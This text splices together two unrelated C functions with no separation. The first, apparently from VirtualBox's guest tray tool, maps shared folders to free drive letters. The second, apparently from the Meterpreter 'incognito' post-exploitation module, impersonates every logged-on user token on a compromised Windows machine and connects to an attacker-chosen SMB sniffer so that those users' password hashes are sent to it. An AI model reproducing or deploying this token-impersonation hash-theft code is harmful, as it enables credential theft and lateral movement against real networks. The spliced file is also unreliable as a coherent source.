int VBoxSharedFoldersAutoMount(void) { uint32_t u32ClientId; int rc = VbglR3SharedFolderConnect(&u32ClientId); if (RT_FAILURE(rc)) Log(("VBoxTray: Failed to connect to the shared folder service, error %Rrc\n", rc)); else { uint32_t cMappings; VBGLR3SHAREDFOLDERMAPPING *paMappings; rc = VbglR3SharedFolderGetMappings(u32ClientId, true /* Only process auto-mounted folders */, &paMappings, &cMappings); if (RT_SUCCESS(rc)) { #if 0 /* Check for a fixed/virtual auto-mount share. */ if (VbglR3SharedFolderExists(u32ClientId, "vbsfAutoMount")) { Log(("VBoxTray: Hosts supports auto-mount root\n")); } else { #endif Log(("VBoxTray: Got %u shared folder mappings\n", cMappings)); for (uint32_t i = 0; i < cMappings && RT_SUCCESS(rc); i++) { char *pszName = NULL; rc = VbglR3SharedFolderGetName(u32ClientId, paMappings[i].u32Root, &pszName); if ( RT_SUCCESS(rc) && *pszName) { Log(("VBoxTray: Connecting share %u (%s) ...\n", i+1, pszName)); char *pszShareName; if (RTStrAPrintf(&pszShareName, "\\\\vboxsrv\\%s", pszName) >= 0) { char chDrive = 'D'; /* Start probing whether drive D: is free to use. */ do { char szCurDrive[3]; RTStrPrintf(szCurDrive, sizeof(szCurDrive), "%c:", chDrive++); NETRESOURCE resource; RT_ZERO(resource); resource.dwType = RESOURCETYPE_ANY; resource.lpLocalName = TEXT(szCurDrive); resource.lpRemoteName = TEXT(pszShareName); /* Go straight to our network provider in order to get maximum lookup speed. */ resource.lpProvider = TEXT("VirtualBox Shared Folders"); /** @todo Figure out how to map the drives in a block (F,G,H, ...). Save the mapping for later use. */ DWORD dwErr = WNetAddConnection2A(&resource, NULL, NULL, 0); if (dwErr == NO_ERROR) { LogRel(("VBoxTray: Shared folder \"%s\" was mounted to drive \"%s\"\n", pszName, szCurDrive)); break; } else { LogRel(("VBoxTray: Mounting \"%s\" to \"%s\" resulted in dwErr = %ld\n", pszName, szCurDrive, dwErr)); switch (dwErr) { /* * The local device specified by the lpLocalName member is already * connected to a network resource. Try next drive ... */ case ERROR_ALREADY_ASSIGNED: break; default: LogRel(("VBoxTray: Error while mounting shared folder \"%s\" to \"%s\", error = %ld\n", pszName, szCurDrive, dwErr)); break; } } } while (chDrive <= 'Z'); if (chDrive > 'Z') { LogRel(("VBoxTray: No free driver letter found to assign shared folder \"%s\", aborting\n", pszName)); break; } RTStrFree(pszShareName); } else rc = VERR_NO_STR_MEMORY; RTStrFree(pszName); } else Log(("VBoxTray: Error while getting the shared folder name for root node = %u, rc = %Rrc\n", paMappings[i].u32Root, rc)); } #if 0 } #endif RTMemFree(paMappings); } else Log(("VBoxTray: Error while getting the shared folder mappings, rc = %Rrc\n", rc)); VbglR3SharedFolderDisconnect(u32ClientId); } return rc; }
// Send off hashes for all tokens to IP address with SMB sniffer running DWORD request_incognito_snarf_hashes(Remote *remote, Packet *packet) { DWORD num_tokens = 0, i; SavedToken *token_list = NULL; NETRESOURCE nr; HANDLE saved_token; char conn_string[BUF_SIZE] = "", domain_name[BUF_SIZE] = "", *smb_sniffer_ip = NULL, return_value[BUF_SIZE] = "", temp[BUF_SIZE] = ""; Packet *response = packet_create_response(packet); smb_sniffer_ip = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_SERVERNAME); // Initialise net_resource structure (essentially just set ip to that of smb_sniffer) if (_snprintf(conn_string, sizeof(conn_string), "\\\\%s", smb_sniffer_ip) == -1) conn_string[sizeof(conn_string)-1] = '\0'; nr.dwType = RESOURCETYPE_ANY; nr.lpLocalName = NULL; nr.lpProvider = NULL; nr.lpRemoteName = (LPSTR)conn_string; // Save current thread token if one is currently being impersonated if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &saved_token)) saved_token = INVALID_HANDLE_VALUE; token_list = get_token_list(&num_tokens); if (!token_list) { packet_transmit_response(GetLastError(), remote, response); goto cleanup; } // Use every token and get hashes by connecting to SMB sniffer for (i=0;i<num_tokens;i++) if (token_list[i].token) { get_domain_from_token(token_list[i].token, domain_name); // If token is not "useless" local account connect to sniffer if (_stricmp(domain_name, "NT AUTHORITY")) { // Impersonate token ImpersonateLoggedOnUser(token_list[i].token); // Cancel previous connection to ensure hashes are sent and existing connection isn't reused WNetCancelConnection2A(nr.lpRemoteName, 0, TRUE); // Connect to smb sniffer if (!WNetAddConnection2A(&nr, NULL, NULL, 0)) // Revert to primary token RevertToSelf(); } CloseHandle(token_list[i].token); } packet_transmit_response(ERROR_SUCCESS, remote, response); cleanup: free(token_list); // Restore token impersonation if (saved_token != INVALID_HANDLE_VALUE) ImpersonateLoggedOnUser(saved_token); return ERROR_SUCCESS; }